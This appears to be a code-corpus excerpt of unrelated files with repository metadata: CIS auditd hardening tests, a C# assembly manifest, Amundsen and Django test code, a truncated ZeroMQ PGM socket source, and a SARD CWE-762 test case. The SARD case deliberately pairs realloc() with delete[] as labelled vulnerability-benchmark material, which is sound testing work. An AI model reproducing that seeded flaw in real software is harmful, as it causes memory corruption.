'path' => '/etc/audit/auditd.conf',
'line' => 'admin_space_left_action = SYSLOG',
'match' => '^admin_space_left_action\ \=',
).that_notifies('Exec[restart_auditd]')
}
# Ensure audit_backlog_limit is sufficient - Section 4.1.2.4 - PASS
# Ensure defaults directory is present for grub settings - Section 4.1.3 prerequisites
it {
is_expected.to contain_file('/etc/default').with(
'ensure' => 'directory',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
)
}
it {
is_expected.to contain_file('/etc/default/grub').with(
'ensure' => 'file',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
).that_requires('File[/etc/default]')
}
# Ensure events that modify date and time information are collected - Section 4.1.3
it {
is_expected.to contain_file_line('time_change_64bit_item1').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S adjtimex -S settimeofday -k time-change',
)
}
it {
is_expected.to contain_file_line('time_change_64bit_item2').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S clock_settime -k time-change',
)
}
it {
is_expected.to contain_file_line('time_change_64bit_item3').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/localtime -p wa -k time-change',
)
}
# Ensure events that modify user/group information are collected - Section 4.1.4
it {
is_expected.to contain_file_line('ownerchange_group').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/group -p wa -k identity',
)
}
it {
is_expected.to contain_file_line('ownerchange_passwd').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/passwd -p wa -k identity',
)
}
it {
is_expected.to contain_file_line('ownerchange_gshadow').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/gshadow -p wa -k identity',
)
}
it {
is_expected.to contain_file_line('ownerchange_shadow').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/shadow -p wa -k identity',
)
}
it {
is_expected.to contain_file_line('ownerchange_opasswd').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/security/opasswd -p wa -k identity',
)
}
# Ensure events that modify the system's network environment are collected - Section 4.1.5
it {
is_expected.to contain_file_line('network_namechanges').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S sethostname -S setdomainname -k system-locale',
)
}
it {
is_expected.to contain_file_line('network_issue').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/issue -p wa -k system-locale',
)
}
it {
is_expected.to contain_file_line('network_issuedotnet').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/issue.net -p wa -k system-locale',
)
}
it {
is_expected.to contain_file_line('network_network').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/sysconfig/network -p wa -k system-locale',
)
}
it {
is_expected.to contain_file_line('network_networkscripts').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/sysconfig/network-scripts/ -p wa -k system-locale',
)
}
# Ensure events that modify the system's Mandatory Access Controls are collected - Section 4.1.6
it {
is_expected.to contain_file_line('macpolicy_selinux').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/selinux/ -p wa -k MAC-policy',
)
}
it {
is_expected.to contain_file_line('macpolicy_selinuxshare').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /usr/share/selinux/ -p wa -k MAC-policy',
)
}
# Ensure that Ensure login and logout events are collected - Section 4.1.7
it {
is_expected.to contain_file_line('lastlogin').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/log/lastlog -p wa -k logins',
)
}
it {
is_expected.to contain_file_line('faillog').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/log/faillog -p wa -k logins',
)
}
it {
is_expected.to contain_file_line('faillock').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/run/faillock/ -p wa -k logins',
)
}
# Ensure session initiation information is collected - Section 4.1.8
it {
is_expected.to contain_file_line('utmp_entry').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/run/utmp -p wa -k session',
)
}
it {
is_expected.to contain_file_line('wtmp_entry').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/run/wtmp -p wa -k logins',
)
}
it {
is_expected.to contain_file_line('btmp_entry').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/run/btmp -p wa -k logins',
)
}
# Ensure discretionary access control permission modification events are collected - Section 4.1.9
it {
is_expected.to contain_file_line('chmod_cmds').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S chmod -S fchmod -S fchmodat -F auid>=1000 -F auid!=4294967295 -k perm_mod',
)
}
it {
is_expected.to contain_file_line('chown_cmds').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S chown -S fchown -S fchownat -S lchown -F auid>=1000 -F auid!=4294967295 -k perm_mod',
)
}
it {
is_expected.to contain_file_line('xattr_cmds').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S setxattr -S lsetxattr -S fsetxattr -S removexattr -S lremovexattr -S fremovexattr -F auid>=1000 -F auid!=4294967295 -k perm_mod',
)
}
# Ensure unsuccessful unauthorized file access attempts are collected - Section 4.1.10
it {
is_expected.to contain_file_line('file_truncate').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S creat -S open -S openat -S truncate -S ftruncate -F exit=-EACCES -F auid>=1000 -F auid!=4294967295 -k access',
)
}
# Ensure use of privileged commands is collected - Section 4.1.11 **unused**
# Ensure succesful filesystem mounts are collected - Section 4.1.12
it {
is_expected.to contain_file_line('mount_cmds').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S mount -F auid>=1000 -F auid!=4294967295 -k mounts',
)
}
# Ensure that Ensure file deletion events by users are captured - Section 4.1.13
it {
is_expected.to contain_file_line('file_deletions').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S unlink -S unlinkat -S rename -S renameat -F auid>=1000 -F auid!=4294967295 -k delete',
)
}
# Ensure that Ensure changes to system administration scope (sudoers) is collected - Section 4.1.14
it {
is_expected.to contain_file_line('sudoers_file').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/sudoers -p wa -k scope',
)
}
it {
is_expected.to contain_file_line('sudoers_dir').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/sudoers.d/ -p wa -k scope',
)
}
# Ensure that Ensure system administrator actions (sudolog) are collected - Section 4.1.15
it {
is_expected.to contain_file_line('sudolog').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/log/sudo.log -p wa -k actions',
)
}
# Ensure that Ensure Kernel module loading and unloading are collected - Section 4.1.16
it {
is_expected.to contain_file_line('check_insmod').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /sbin/insmod -p x -k modules',
)
}
it {
is_expected.to contain_file_line('check_rmmod').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /sbin/rmmod -p x -k modules',
)
}
it {
is_expected.to contain_file_line('check_modprobe').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /sbin/modprobe -p x -k modules',
)
}
it {
is_expected.to contain_file_line('check_modulestate').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S init_module -S delete_module -k modules',
)
}
# Ensure the audit configuration is immutable - Section 4.1.17
it {
is_expected.to contain_file_line('make_auditd_immutable').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-e 2',
'match' => '^-e\ ',
'append_on_no_match' => true,
)
}
# Ensure manifest compiles with all dependencies
it {
is_expected.to compile.with_all_deps
}
end
end
end
|
Ruby
|
Apache-2.0
|
cvquesty/cis_hardening/.history/spec/classes/logaudit/accounting_spec_20201105103625.rb
|
84a55dc5-11d5-4d95-b3b4-3f65bdc141e2
|
[]
|
[]
|
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SMB NES ROM Text Editor")]
[assembly: AssemblyDescription("This program will let you change the text of the ROM Super Mario Bros. (JU) (PRG0) [!].nes.")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("[sleepy]")]
[assembly: AssemblyProduct("SMB NES ROM Text Editor")]
[assembly: AssemblyCopyright("Copyright © Shawn M. Crawford 2010-2016")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("7bf5d19f-560a-42f0-9a61-a1b19aca3e69")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.1.0.*")]
[assembly: AssemblyFileVersion("1.1.0.0")]
|
C#
|
MIT
|
sleepy9090/smbnesromtexteditor/smbnesromtexteditor/Properties/AssemblyInfo.cs
|
b7550bf3-2402-4f92-8275-d17127b30d5f
|
[{"tag": "NAME", "value": "Shawn M. Crawford", "start": 647, "end": 664, "context": "itor\")]\n[assembly: AssemblyCopyright(\"Copyright \u00a9 Shawn M. Crawford 2010-2016\")]\n[assembly: AssemblyTrademark(\"\")]\n[a"}, {"tag": "AMBIGUOUS", "value": "1.1.0.0", "start": 1529, "end": 1536, "context": "rsion(\"1.1.0.*\")]\n[assembly: AssemblyFileVersion(\"1.1.0.0\")]\n"}]
|
[{"tag": "NAME", "value": "Shawn M. Crawford", "start": 647, "end": 664, "context": "itor\")]\n[assembly: AssemblyCopyright(\"Copyright \u00a9 Shawn M. Crawford 2010-2016\")]\n[assembly: AssemblyTrademark(\"\")]\n[a"}, {"tag": "AMBIGUOUS", "value": "1.1.0.0", "start": 1529, "end": 1536, "context": "rsion(\"1.1.0.*\")]\n[assembly: AssemblyFileVersion(\"1.1.0.0\")]\n"}]
|
# Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import unittest
from unittest.mock import ANY
from databuilder.models.graph_serializable import (
RELATION_END_KEY, RELATION_END_LABEL, RELATION_REVERSE_TYPE, RELATION_START_KEY, RELATION_START_LABEL,
RELATION_TYPE,
)
from databuilder.models.table_source import TableSource
from databuilder.serializers import neo4_serializer, neptune_serializer
from databuilder.serializers.neptune_serializer import (
NEPTUNE_CREATION_TYPE_JOB, NEPTUNE_CREATION_TYPE_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT, NEPTUNE_HEADER_ID,
NEPTUNE_HEADER_LABEL, NEPTUNE_LAST_EXTRACTED_AT_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT,
NEPTUNE_RELATIONSHIP_HEADER_FROM, NEPTUNE_RELATIONSHIP_HEADER_TO,
)
DB = 'hive'
SCHEMA = 'base'
TABLE = 'test'
CLUSTER = 'default'
SOURCE = '/etl/sql/file.py'
class TestTableSource(unittest.TestCase):
def setUp(self) -> None:
super(TestTableSource, self).setUp()
self.table_source = TableSource(db_name='hive',
schema=SCHEMA,
table_name=TABLE,
cluster=CLUSTER,
source=SOURCE)
self.start_key = f'{DB}://{CLUSTER}.{SCHEMA}/{TABLE}/_source'
self.end_key = f'{DB}://{CLUSTER}.{SCHEMA}/{TABLE}'
def test_get_source_model_key(self) -> None:
source = self.table_source.get_source_model_key()
self.assertEqual(source, f'{DB}://{CLUSTER}.{SCHEMA}/{TABLE}/_source')
def test_get_metadata_model_key(self) -> None:
metadata = self.table_source.get_metadata_model_key()
self.assertEqual(metadata, 'hive://default.base/test')
def test_create_nodes(self) -> None:
nodes = self.table_source.create_nodes()
self.assertEqual(len(nodes), 1)
def test_create_relation(self) -> None:
relations = self.table_source.create_relation()
self.assertEquals(len(relations), 1)
serialized_relation = neo4_serializer.serialize_relationship(relations[0])
expected_relation = {
RELATION_START_KEY: self.start_key,
RELATION_START_LABEL: TableSource.LABEL,
RELATION_END_KEY: self.end_key,
RELATION_END_LABEL: 'Table',
RELATION_TYPE: TableSource.SOURCE_TABLE_RELATION_TYPE,
RELATION_REVERSE_TYPE: TableSource.TABLE_SOURCE_RELATION_TYPE
}
self.assertDictEqual(expected_relation, serialized_relation)
def test_create_relation_neptune(self) -> None:
relations = self.table_source.create_relation()
serialized_relations = neptune_serializer.convert_relationship(relations[0])
expected = [
{
NEPTUNE_HEADER_ID: "{from_vertex_id}_{to_vertex_id}_{label}".format(
from_vertex_id=self.start_key,
to_vertex_id=self.end_key,
label=TableSource.SOURCE_TABLE_RELATION_TYPE
),
NEPTUNE_RELATIONSHIP_HEADER_FROM: self.start_key,
NEPTUNE_RELATIONSHIP_HEADER_TO: self.end_key,
NEPTUNE_HEADER_LABEL: TableSource.SOURCE_TABLE_RELATION_TYPE,
NEPTUNE_LAST_EXTRACTED_AT_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT: ANY,
NEPTUNE_CREATION_TYPE_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT: NEPTUNE_CREATION_TYPE_JOB
},
{
NEPTUNE_HEADER_ID: "{from_vertex_id}_{to_vertex_id}_{label}".format(
from_vertex_id=self.end_key,
to_vertex_id=self.start_key,
label=TableSource.TABLE_SOURCE_RELATION_TYPE
),
NEPTUNE_RELATIONSHIP_HEADER_FROM: self.end_key,
NEPTUNE_RELATIONSHIP_HEADER_TO: self.start_key,
NEPTUNE_HEADER_LABEL: TableSource.TABLE_SOURCE_RELATION_TYPE,
NEPTUNE_LAST_EXTRACTED_AT_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT: ANY,
NEPTUNE_CREATION_TYPE_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT: NEPTUNE_CREATION_TYPE_JOB
}
]
self.assertListEqual(expected, serialized_relations)
|
Python
|
Apache-2.0
|
JacobSMoller/amundsendatabuilder/tests/unit/models/test_table_source.py
|
69b749dd-21de-4ad7-beb1-5dd5bf908991
|
[]
|
[]
|
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE762_Mismatched_Memory_Management_Routines__delete_array_int64_t_realloc_62b.cpp
Label Definition File: CWE762_Mismatched_Memory_Management_Routines__delete_array.label.xml
Template File: sources-sinks-62b.tmpl.cpp
*/
/*
* @description
* CWE: 762 Mismatched Memory Management Routines
* BadSource: realloc Allocate data using realloc()
* GoodSource: Allocate data using new []
* Sinks:
* GoodSink: Deallocate data using free()
* BadSink : Deallocate data using delete []
* Flow Variant: 62 Data flow: data flows using a C++ reference from one function to another in different source files
*
* */
#include "std_testcase.h"
namespace CWE762_Mismatched_Memory_Management_Routines__delete_array_int64_t_realloc_62
{
#ifndef OMITBAD
void badSource(int64_t * &data)
{
data = NULL;
/* POTENTIAL FLAW: Allocate memory with a function that requires free() to free the memory */
data = (int64_t *)realloc(data, 100*sizeof(int64_t));
}
#endif /* OMITBAD */
#ifndef OMITGOOD
/* goodG2B() uses the GoodSource with the BadSink */
void goodG2BSource(int64_t * &data)
{
/* FIX: Allocate memory using new [] */
data = new int64_t[100];
}
/* goodB2G() uses the BadSource with the GoodSink */
void goodB2GSource(int64_t * &data)
{
data = NULL;
/* POTENTIAL FLAW: Allocate memory with a function that requires free() to free the memory */
data = (int64_t *)realloc(data, 100*sizeof(int64_t));
}
#endif /* OMITGOOD */
} /* close namespace */
|
C++
|
Apache-2.0
|
kppw99/enVAS/dataset/source/SARD/SARD-6/113515/CWE762_Mismatched_Memory_Management_Routines__delete_array_int64_t_realloc_62b.cpp
|
60ef89f2-70b5-4ba4-af35-14b5c886ed91
|
[]
|
[]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
__author__ = 'Tim Schneider <tim.schneider@northbridge-development.de>'
__copyright__ = "Copyright 2015, Northbridge Development Konrad & Schneider GbR"
__credits__ = ["Tim Schneider", ]
__maintainer__ = "Tim Schneider"
__email__ = "mail@northbridge-development.de"
__status__ = "Development"
logger = logging.getLogger(__name__)
import glob
import os
import sys
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))
print BASE_DIR
sys.path.insert(0, os.path.abspath(BASE_DIR))
try:
import coverage # Import coverage if available
cov = coverage.coverage(
cover_pylib=False,
config_file=os.path.join(os.path.dirname(__file__), 'coverage.conf'),
include='%s/*' % BASE_DIR,
)
cov.start()
sys.stdout.write('Using coverage\n')
except ImportError:
cov = None
sys.stdout.write('Coverage not available. To evaluate the coverage, please install coverage.\n')
import django
from django.conf import settings
from django.core.management import execute_from_command_line
# Unfortunately, apps can not be installed via ``modify_settings``
# decorator, because it would miss the database setup.
INSTALLED_APPS = (
'django_splitdate',
)
settings.configure(
SECRET_KEY="django_tests_secret_key",
DEBUG=False,
TEMPLATE_DEBUG=False,
ALLOWED_HOSTS=[],
INSTALLED_APPS=INSTALLED_APPS,
MIDDLEWARE_CLASSES=[],
ROOT_URLCONF='tests.urls',
DATABASES={
'default': {
'ENGINE': 'django.db.backends.sqlite3',
}
},
LANGUAGE_CODE='en-us',
TIME_ZONE='UTC',
USE_I18N=True,
USE_L10N=True,
USE_TZ=True,
STATIC_URL='/static/',
# Use a fast hasher to speed up tests.
PASSWORD_HASHERS=(
'django.contrib.auth.hashers.MD5PasswordHasher',
),
FIXTURE_DIRS=glob.glob(BASE_DIR + '/' + '*/fixtures/')
)
django.setup()
args = [sys.argv[0], 'test']
# Current module (``tests``) and its submodules.
test_cases = '.'
# Allow accessing test options from the command line.
offset = 1
try:
sys.argv[1]
except IndexError:
pass
else:
option = sys.argv[1].startswith('-')
if not option:
test_cases = sys.argv[1]
offset = 2
args.append(test_cases)
# ``verbosity`` can be overwritten from command line.
#args.append('--verbosity=2')
args.extend(sys.argv[offset:])
execute_from_command_line(args)
if cov is not None:
sys.stdout.write('Evaluating Coverage\n')
cov.stop()
cov.save()
sys.stdout.write('Generating HTML Report\n')
cov.html_report()
|
Python
|
MIT
|
Mactory/django-splitdate/django_splitdate/tests/runtests.py
|
080a22dc-8ff8-4b6e-83fb-33439664d4de
|
[{"tag": "NAME", "value": "Tim Schneider", "start": 267, "end": 280, "context": "credits__ = [\"Tim Schneider\", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = \"mail@northbridge-development.de\"\n__"}, {"tag": "NAME", "value": "Tim Schneider", "start": 76, "end": 89, "context": "- coding: utf-8 -*-\nimport logging\n\n__author__ = 'Tim Schneider <tim.schneider@northbridge-development.de>'\n__cop"}, {"tag": "EMAIL", "value": "mail@northbridge-development.de", "start": 295, "end": 326, "context": ", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = \"mail@northbridge-development.de\"\n__status__ = \"Development\"\n\nlogger = logging.get"}, {"tag": "EMAIL", "value": "tim.schneider@northbridge-development.de", "start": 91, "end": 131, "context": " -*-\nimport logging\n\n__author__ = 'Tim Schneider <tim.schneider@northbridge-development.de>'\n__copyright__ = \"Copyright 2015, Northbridge De"}, {"tag": "NAME", "value": "Tim Schneider", "start": 231, "end": 244, "context": "velopment Konrad & Schneider GbR\"\n__credits__ = [\"Tim Schneider\", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = "}]
|
[{"tag": "NAME", "value": "Tim Schneider", "start": 267, "end": 280, "context": "credits__ = [\"Tim Schneider\", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = \"mail@northbridge-development.de\"\n__"}, {"tag": "NAME", "value": "Tim Schneider", "start": 76, "end": 89, "context": "- coding: utf-8 -*-\nimport logging\n\n__author__ = 'Tim Schneider <tim.schneider@northbridge-development.de>'\n__cop"}, {"tag": "EMAIL", "value": "mail@northbridge-development.de", "start": 295, "end": 326, "context": ", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = \"mail@northbridge-development.de\"\n__status__ = \"Development\"\n\nlogger = logging.get"}, {"tag": "EMAIL", "value": "tim.schneider@northbridge-development.de", "start": 91, "end": 131, "context": " -*-\nimport logging\n\n__author__ = 'Tim Schneider <tim.schneider@northbridge-development.de>'\n__copyright__ = \"Copyright 2015, Northbridge De"}, {"tag": "NAME", "value": "Tim Schneider", "start": 231, "end": 244, "context": "velopment Konrad & Schneider GbR\"\n__credits__ = [\"Tim Schneider\", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = "}]
|
/*
Copyright (c) 2007-2013 Contributors as noted in the AUTHORS file
This file is part of 0MQ.
0MQ is free software; you can redistribute it and/or modify it under
the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
0MQ is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "platform.hpp"
#ifdef ZMQ_HAVE_OPENPGM
#ifdef ZMQ_HAVE_WINDOWS
#include "windows.hpp"
#endif
#ifdef ZMQ_HAVE_LINUX
#include <poll.h>
#endif
#include <stdlib.h>
#include <string.h>
#include <string>
#include "options.hpp"
#include "pgm_socket.hpp"
#include "config.hpp"
#include "err.hpp"
#include "random.hpp"
#include "stdint.hpp"
#ifndef MSG_ERRQUEUE
#define MSG_ERRQUEUE 0x2000
#endif
zmq::pgm_socket_t::pgm_socket_t (bool receiver_, const options_t &options_) :
sock (NULL),
options (options_),
receiver (receiver_),
pgm_msgv (NULL),
pgm_msgv_len (0),
nbytes_rec (0),
nbytes_processed (0),
pgm_msgv_processed (0)
{
}
// Resolve PGM socket address.
// network_ of the form <interface & multicast group decls>:<IP port>
// e.g. eth0;239.192.0.1:7500
// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000
// ;[fe80::1%en0]:7500
int zmq::pgm_socket_t::init_address (const char *network_,
struct pgm_addrinfo_t **res, uint16_t *port_number)
{
// Parse port number, start from end for IPv6
const char *port_delim = strrchr (network_, ':');
if (!port_delim) {
errno = EINVAL;
return -1;
}
*port_number = atoi (port_delim + 1);
char network [256];
if (port_delim - network_ >= (int) sizeof (network) - 1) {
errno = EINVAL;
return -1;
}
memset (network, '\0', sizeof (network));
memcpy (network, network_, port_delim - network_);
pgm_error_t *pgm_error = NULL;
struct pgm_addrinfo_t hints;
memset (&hints, 0, sizeof (hints));
hints.ai_family = AF_UNSPEC;
if (!pgm_getaddrinfo (network, NULL, res, &pgm_error)) {
// Invalid parameters don't set pgm_error_t.
zmq_assert (pgm_error != NULL);
if (pgm_error->domain == PGM_ERROR_DOMAIN_IF &&
// NB: cannot catch EAI_BADFLAGS.
( pgm_error->code != PGM_ERROR_SERVICE &&
pgm_error->code != PGM_ERROR_SOCKTNOSUPPORT)) {
// User, host, or network configuration or transient error.
pgm_error_free (pgm_error);
errno = EINVAL;
return -1;
}
// Fatal OpenPGM internal error.
zmq_assert (false);
}
return 0;
}
// Create, bind and connect PGM socket.
int zmq::pgm_socket_t::init (bool udp_encapsulation_, const char *network_)
{
// Can not open transport before destroying old one.
zmq_assert (sock == NULL);
zmq_assert (options.rate > 0);
// Zero counter used in msgrecv.
nbytes_rec = 0;
nbytes_processed = 0;
pgm_msgv_processed = 0;
uint16_t port_number;
struct pgm_addrinfo_t *res = NULL;
sa_family_t sa_family;
pgm_error_t *pgm_error = NULL;
if (init_address(network_, &res, &port_number) < 0) {
goto err_abort;
}
zmq_assert (res != NULL);
// Pick up detected IP family.
sa_family = res->ai_send_addrs[0].gsr_group.ss_family;
// Create IP/PGM or UDP/PGM socket.
if (udp_encapsulation_) {
if (!pgm_socket (&sock, sa_family, SOCK_SEQPACKET, IPPROTO_UDP,
&pgm_error)) {
// Invalid parameters don't set pgm_error_t.
zmq_assert (pgm_error != NULL);
if (pgm_error->domain == PGM_ERROR_DOMAIN_SOCKET && (
pgm_error->code != PGM_ERROR_BADF &&
pgm_error->code != PGM_ERROR_FAULT &&
pgm_error->code != PGM_ERROR_NOPROTOOPT &&
pgm_error->code != PGM_ERROR_FAILED))
// User, host, or network configuration or transient error.
goto err_abort;
// Fatal OpenPGM internal error.
zmq_assert (false);
}
// All options are of data type int
const int encapsulation_port = port_number;
if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_UDP_ENCAP_UCAST_PORT,
&encapsulation_port, sizeof (encapsulation_port)))
goto err_abort;
if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_UDP_ENCAP_MCAST_PORT,
&encapsulation_port, sizeof (encapsulation_port)))
goto err_abort;
}
else {
if (!pgm_socket (&sock, sa_family, SOCK_SEQPACKET, IPPROTO_PGM,
&pgm_error)) {
// Invalid parameters don't set pgm_error_t.
zmq_assert (pgm_error != NULL);
if (pgm_error->domain == PGM_ERROR_DOMAIN_SOCKET && (
pgm_error->code != PGM_ERROR_BADF &&
pgm_error->code != PGM_ERROR_FAULT &&
pgm_error->code != PGM_ERROR_NOPROTOOPT &&
pgm_error->code != PGM_ERROR_FAILED))
// User, host, or network configuration or transient error.
goto err_abort;
// Fatal OpenPGM internal error.
zmq_assert (false);
}
}
{
const int rcvbuf = (int) options.rcvbuf;
if (rcvbuf) {
if (!pgm_setsockopt (sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf,
sizeof (rcvbuf)))
goto err_abort;
}
const int sndbuf = (int) options.sndbuf;
if (sndbuf) {
if (!pgm_setsockopt (sock, SOL_SOCKET, SO_SNDBUF, &sndbuf,
sizeof (sndbuf)))
goto err_abort;
}
const int max_tpdu = (int) pgm_max_tpdu;
if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_MTU, &max_tpdu,
sizeof (max_tpdu)))
goto err_abort;
}
if (receiver) {
const int recv_only = 1,
rxw_max_tpdu = (int) pgm_max_tpdu,
rxw_sqns = compute_sqns (rxw_max_tpdu),
peer_expiry = pgm_secs (300),
spmr_expiry = pgm_msecs (25),
nak_bo_ivl = pgm_msecs (50),
nak_rpt_ivl = pgm_msecs (200),
nak_rdata_ivl = pgm_msecs (200),
nak_data_retries = 50,
nak_ncf_retries = 50;
if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_RECV_ONLY, &recv_only,
sizeof (recv_only)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_RXW_SQNS, &rxw_sqns,
sizeof (rxw_sqns)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_PEER_EXPIRY, &peer_expiry,
sizeof (peer_expiry)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_SPMR_EXPIRY, &spmr_expiry,
sizeof (spmr_expiry)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_NAK_BO_IVL, &nak_bo_ivl,
sizeof (nak_bo_ivl)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_NAK_RPT_IVL, &nak_rpt_ivl,
sizeof (nak_rpt_ivl)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_NAK_RDATA_IVL,
&nak_rdata_ivl, sizeof (nak_rdata_ivl)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_NAK_DATA_RETRIES,
&nak_data_retries, sizeof (nak_data_retries)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_NAK_NCF_RETRIES,
&nak_ncf_retries, sizeof (nak_ncf_retries)))
goto err_abort;
}
else {
const int send_only = 1,
max_rte = (int) ((options.rate * 1000) / 8),
txw_max_tpdu = (int) pgm_max_tpdu,
txw_sqns = compute_sqns (txw_max_tpdu),
ambient_spm = pgm_secs (30),
heartbeat_spm[] = { pgm_msecs (100),
pgm_msecs (100),
pgm_msecs (100),
pgm_msecs (100),
pgm_msecs (1300),
pgm_secs (7),
pgm_secs (16),
pgm_secs (25),
pgm_secs (30) };
if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_SEND_ONLY,
&send_only, sizeof (send_only)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_ODATA_MAX_RTE,
&max_rte, sizeof (max_rte)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_TXW_SQNS,
&txw_sqns, sizeof (txw_sqns)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_AMBIENT_SPM,
&ambient_spm, sizeof (ambient_spm)) ||
!pgm_setsockopt (sock, IPPROTO_PGM, PGM_HEARTBEAT_SPM,
&heartbeat_spm, sizeof (heartbeat_spm)))
goto err_abort;
}
// PGM transport GSI.
struct pgm_sockaddr_t addr;
memset (&addr, 0, sizeof(addr));
addr.sa_port = port_number;
addr.sa_addr.sport = DEFAULT_DATA_SOURCE_PORT;
// Create random GSI.
uint32_t buf [2];
buf [0] = generate_random ();
buf [1] = generate_random ();
if (!pgm_gsi_create_from_data (&addr.sa_addr.gsi, (uint8_t*) buf, 8))
goto err_abort;
// Bind a transport to the specified network devices.
struct pgm_interface_req_t if_req;
memset (&if_req, 0, sizeof(if_req));
if_req.ir_interface = res->ai_recv_addrs[0].gsr_interface;
if_req.ir_scope_id = 0;
